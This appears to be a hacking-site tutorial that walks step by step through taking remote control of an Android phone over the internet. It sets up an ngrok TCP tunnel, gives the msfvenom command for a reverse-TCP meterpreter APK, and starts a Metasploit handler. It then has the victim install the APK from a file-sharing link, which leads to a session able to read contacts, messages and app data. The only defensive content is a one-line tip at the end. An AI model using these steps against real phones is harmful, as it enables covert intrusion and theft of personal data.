How to Remotely Hack an Android Phone – WAN or Internet hacking

This tutorial is the answer to the most common questions (e.g., Hacking android over WAN) asked by our readers and followers:

  • How to hack android outside the LAN or NAT?
  • Hacking android on the WAN & real world, is it possible?
  • Create an android hacking tutorial over the internet outside the lab environment

This tutorial is designed to show you how you can hack an android phone remotely over the internet. In the previous article of android hacking we did learn how to hack an android device over LAN, but what if we want to get access to a device that is not connected on our network?

Usually in WAN, first, you need to have a Static IP/Hostname, and second, you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real-time as we have limited access to ports in a network.

So, what we will do in this scenario, we will set up a secure tunnel using Ngrok.

Ngrok is a tunneling reverse proxy system that establishes tunnels from public endpoint i.e., an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP tunneling.

Step by Step Demo:

Step 01: Create an account on Ngrok to download

First you need to install Ngrok in your Kali machine.

Fire up Kali, and browse Ngrok to access its official website:

You have to make an account first. Go to the signup option and fill all the necessary fields.

Create an account on Ngrok to download(CAUTION: Do not use your work email or an email that has access to your private information. It is a best practice to use temporary emails while performing penetration testing. You can also use to create your account)

After signing up, you can download ngrok installer for Linux.

Setup and Installation

Step 02: Unzip the downloaded file

Go to Download directory where your downloaded file resides.

Unzip the downloaded file

You have to unzip this file. Use unzip command to extract the file.

Step 03: Copy the token, given to your account

After unzipping, you have to save the token that was given to your account.

Copy the token, given to your account

Copy the token from here and paste it in your terminal. Make sure to paste the token in a same directory where you have ngrok.

Copy the token from here and paste it in your terminal

You are all set to use this tool. Type in terminal:

# ./ngrok tcp [Port no:]  (choose any port number on which you want to bind a connection)choose any port number on which you want to bind a connection

choose any port number on which you want to bind a connectionThe forwarding here specifies the TCP tunnel which ngrok has created. The connection has bind to localhost at port 4242. Now we need to generate a malicious payload by using msfvenom.

Step 04: Generate a payload by using msfvenom

Type command:

# msfvenom -p android/meterpreter/reverse_tcp LPORT=10900 R > /root/Desktop/android.apk

Type command

Step 05: Start reverse TCP handler

Launch Metasploit-framework

Set exploit as multi/handler, Lhost as localhost i.e, Lport as 4242 and run exploit.

Start reverse TCP handler

Step 06: Download the payload on your android phone to get a meterpreter session

To download this payload on android device we will upload it on, a very useful website to upload your files securely & anonymously .

Download the payload on your android phone to get a meterpreter sessionBrowse this link on your android phone, it will download the zip file of our payload. Unzip it and install it in your phone. (allow option to install it from third-party sources)

After installing and running the app from my android phone, I got a session in my Kali attacking machine.

I got a session in my Kali attacking machine

That is how you can actually exploit an android phone and gain access remotely over the internet rather than on your local area network. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don’t have awareness.

This exploit is tested on Android version 9.0, which is not an old version and currently in use by many users. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Blind SQL Injection Tutorial to Hack a Website

In the previous article, we have the basics of SQL Injection; what SQLi is and what are the types of SQL injection. And, In...

What is SQL Injection? Tutorial: Type and Example

What is SQL injection, and what are the types of SQL injection? These are the common questions, and we will seek the answer to...

Are Cisco 300-410 Exam and Its Related Certification Your Pathway to Career Success? Find Out about This

Introduction Career success can mean different things to different people. For some, it could mean having a prestigious title and for others, it could be...

How to Hack Windows 10 Password Using FakeLogonScreen in Kali Linux

This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic and...